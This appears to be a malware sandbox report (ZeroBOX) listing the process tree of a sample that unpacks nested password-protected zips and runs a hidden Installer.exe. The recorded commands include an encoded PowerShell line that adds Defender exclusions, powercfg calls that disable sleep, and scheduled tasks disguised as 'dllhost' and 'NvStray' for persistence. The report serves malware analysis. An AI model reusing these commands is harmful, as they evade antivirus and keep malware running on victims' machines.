| ZeroBOX

conhost.exe "C:\Users\test22\AppData\Local\Temp\conhost.exe"
1212
- cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\main\main.bat" /S"
  2152
  - mode.com mode 65,10
    2212
  - 7z.exe 7z.exe e file.zip -p1432210452150682449214609890 -oextracted
    2284
  - 7z.exe 7z.exe e extracted/file_8.zip -oextracted
    2344
  - 7z.exe 7z.exe e extracted/file_7.zip -oextracted
    2392
  - 7z.exe 7z.exe e extracted/file_6.zip -oextracted
    2440
  - 7z.exe 7z.exe e extracted/file_5.zip -oextracted
    2488
  - 7z.exe 7z.exe e extracted/file_4.zip -oextracted
    2536
  - 7z.exe 7z.exe e extracted/file_3.zip -oextracted
    2584
  - 7z.exe 7z.exe e extracted/file_2.zip -oextracted
    2640
  - 7z.exe 7z.exe e extracted/file_1.zip -oextracted
    2688
  - attrib.exe attrib +H "Installer.exe"
    2736
  - Installer.exe "Installer.exe"
    2780
    - cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAHcAMwBWACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMARABvAEQAZgBOAE8AMQBxAGMARwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwA3ADMAeABVAHAAbwA3AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBTAHMAaQAwAGMAVQBwACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
      3000
      - powershell.exe powershell -EncodedCommand "PAAjAHcAMwBWACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMARABvAEQAZgBOAE8AMQBxAGMARwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwA3ADMAeABVAHAAbwA3AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBTAHMAaQAwAGMAVQBwACMAPgA="
        3056
      - powercfg.exe powercfg /x -hibernate-timeout-ac 0
        2272
      - powercfg.exe powercfg /x -hibernate-timeout-dc 0
        2364
      - powercfg.exe powercfg /x -standby-timeout-ac 0
        2412
      - powercfg.exe powercfg /x -standby-timeout-dc 0
        2492
      - powercfg.exe powercfg /hibernate off
        2660
    - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk32" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      2820
    - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      2764
      - schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        2136

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents